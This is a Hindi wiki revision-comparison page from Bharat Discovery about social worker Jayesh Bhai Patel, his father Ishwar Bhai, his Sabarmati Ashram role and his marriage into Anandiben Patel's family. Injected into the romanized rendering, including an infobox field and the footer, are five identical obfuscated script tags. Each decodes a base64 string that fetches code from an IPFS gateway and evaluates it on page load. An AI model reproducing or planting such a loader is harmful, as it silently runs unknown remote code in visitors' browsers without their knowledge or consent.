Difference between revisions of "जयेश भाई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{सूचना बक्सा प्रसिद्ध व्यक्तित्व |चित्र=Jyesh_bhai.jpg |चित्...' के साथ नया पन्ना बनाया)
 
m (Text replace - "अविभावक" to "अभिभावक")
 
(3 intermediate revisions by one other user not shown)
Line 1: Line 1:
 
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
 
{{सूचना बक्सा प्रसिद्ध व्यक्तित्व
 
|चित्र=Jyesh_bhai.jpg
 
|चित्र=Jyesh_bhai.jpg
|चित्र का नाम=  
+
|चित्र का नाम= जयेश भाई
 
|पूरा नाम=जयेश भाई  
 
|पूरा नाम=जयेश भाई  
|अन्य नाम=जयेश भाई
+
|अन्य नाम=  
 
|जन्म=
 
|जन्म=
|जन्म भूमि=खरोद गांव,  विजापुर तालुका,  [[मेहसाणा]], [[गुजरात]] 
+
|जन्म भूमि=
 
|मृत्यु=
 
|मृत्यु=
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|मृत्यु कारण=
 
|मृत्यु कारण=
|अविभावक=
+
|अभिभावक=
 
|पति/पत्नी=अनार पटेल  
 
|पति/पत्नी=अनार पटेल  
 
|संतान=
 
|संतान=
 
|स्मारक=  
 
|स्मारक=  
|क़ब्र=
 
|नागरिकता=भारतीय
 
|प्रसिद्धि=
 
|पार्टी=[[भारतीय जनता पार्टी]]
 
|पद=[[गुजरात के मुख्यमंत्री|गुजरात की मुख्यमंत्री]]
 
|भाषा=[[हिंदी]], [[अंग्रेज़ी]], [[गुजराती]]
 
 
|शिक्षा=
 
|शिक्षा=
 
|विद्यालय=
 
|विद्यालय=
|पुरस्कार-उपाधि=
+
|पुरस्कार-उपाधि=[[पद्म श्री]]
 
|प्रसिद्धि=समाज सुधारक
 
|प्रसिद्धि=समाज सुधारक
 
|विशेष योगदान=
 
|विशेष योगदान=
Line 31: Line 25:
 
|शीर्षक 3=
 
|शीर्षक 3=
 
|पाठ 3=
 
|पाठ 3=
|शीर्षक 4=
+
|अन्य जानकारी= जयेश भाई पटेल [[गुजरात]] की नवनिर्वाचित मुख्यमंत्री आदरणीया [[आनन्दीबेन पटेल]] के दामाद हैं।
|पाठ 4=
 
|शीर्षक 5=
 
|पाठ 5=
 
|अन्य जानकारी=
 
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन=
+
|अद्यतन={{अद्यतन|17:26, 24 मई 2014 (IST)}}
 
}}
 
}}
'''जयेश भाई पटेल''' ([[अंग्रेज़ी]]: ''Jayesh Bhai Patel'', जन्म: [[21 नवंबर]] [[1969]]) प्रसिद्ध समाज सेवी पद्म श्री सम्मानित ईश्वर भाई के पुत्र है। श्री जयेश भाई ने देश विदेश में उच्च शिक्षा प्राप्त कर के आकर्षक पैकेज को छोड़ कर समाज सेवा का रास्ता चुना है। श्री जयेश [[साबरमती आश्रम]] के अध्यक्ष भी हैं। उनके हर कार्यक्रम में सुरुचि, व्यवस्था,सेवा के अद्भुत दर्शन होते है। उदाहरण के लिए आश्रम के वाहनों के नाम कृतज्ञता, विनम्रता, करुणा, उपासना आदि एक बार ईश्वर भाई [[सर्वोदय आश्रम टडियांवा]] में भी आए है।  
+
'''जयेश भाई पटेल''' ([[अंग्रेज़ी]]: ''Jayesh Bhai Patel'') प्रसिद्ध समाज सेवी [[पद्म श्री]] सम्मानित ईश्वर भाई के पुत्र है। जयेश भाई ने देश विदेश में उच्च शिक्षा प्राप्त कर के आकर्षक पैकेज को छोड़ कर समाज सेवा का रास्ता चुना है। जयेश [[साबरमती आश्रम]] के अध्यक्ष भी हैं। उनके हर कार्यक्रम में सुरुचि, व्यवस्था, सेवा के अद्भुत दर्शन होते है। उदाहरण के लिए आश्रम के वाहनों के नाम कृतज्ञता, विनम्रता, करुणा, उपासना आदि एक बार ईश्वर भाई [[सर्वोदय आश्रम टडियांवा]] में भी आए है। ईश्वर भाई ने गांधी शताब्दी वर्ष में यह संकल्प लिया कि वह वर्ष भर जब तक 10 शोचालयों की सफाई नहीं कर लेंगे तब तक भोजन ग्रहण नहीं करेंगे। जयेश इस कड़ी को आगे बढ़ा रहे हैं अपनी पत्नी अनार बहन के साथ मिलकर। यह अनार बहन [[गुजरात]] की नयी मुख्यमंत्री आदरणीया [[आनन्दीबेन पटेल]] की पुत्री हैं और जयेश उनके दामाद है।
श्री ईश्वर भाई ने गांधी शताब्दी वर्ष में यह संकल्प लिया कि वह वर्ष भर जब तक 10 शोचालयों की सफाई नहीं कर लेंगे तब तक भोजन ग्रहण नहीं करेंगे।  
+
 
जयेश इस कड़ी को आगे बढ़ा रहें हैं अपनी पत्नी अनार बहन के साथ मिलकर। यह अनार बहन [[गुजरात]] की नयी मुख्यमंत्री आदरणीया [[आनन्दीबेन पटेल]] की पुत्री हैं और जयेश उनके दामाद है।
+
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 05:00, 29 May 2015

jayesh bhaee
poora nam jayesh bhaee
pati/patni anar patel
puraskar-upadhi padm shri
prasiddhi samaj sudharak
nagarikata bharatiy
any janakari jayesh bhaee patel gujarat ki navanirvachit mukhyamantri adaraniya anandiben patel ke damad haian.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jayesh bhaee patel (aangrezi: Jayesh Bhai Patel) prasiddh samaj sevi padm shri sammanit eeshvar bhaee ke putr hai. jayesh bhaee ne desh videsh mean uchch shiksha prapt kar ke akarshak paikej ko chho d kar samaj seva ka rasta chuna hai. jayesh sabaramati ashram ke adhyaksh bhi haian. unake har karyakram mean suruchi, vyavastha, seva ke adbhut darshan hote hai. udaharan ke lie ashram ke vahanoan ke nam kritajnata, vinamrata, karuna, upasana adi ek bar eeshvar bhaee sarvoday ashram tadiyaanva mean bhi ae hai. eeshvar bhaee ne gaandhi shatabdi varsh mean yah sankalp liya ki vah varsh bhar jab tak 10 shochalayoan ki saphaee nahian kar leange tab tak bhojan grahan nahian kareange. jayesh is k di ko age badha rahe haian apani patni anar bahan ke sath milakar. yah anar bahan gujarat ki nayi mukhyamantri adaraniya anandiben patel ki putri haian aur jayesh unake damad hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>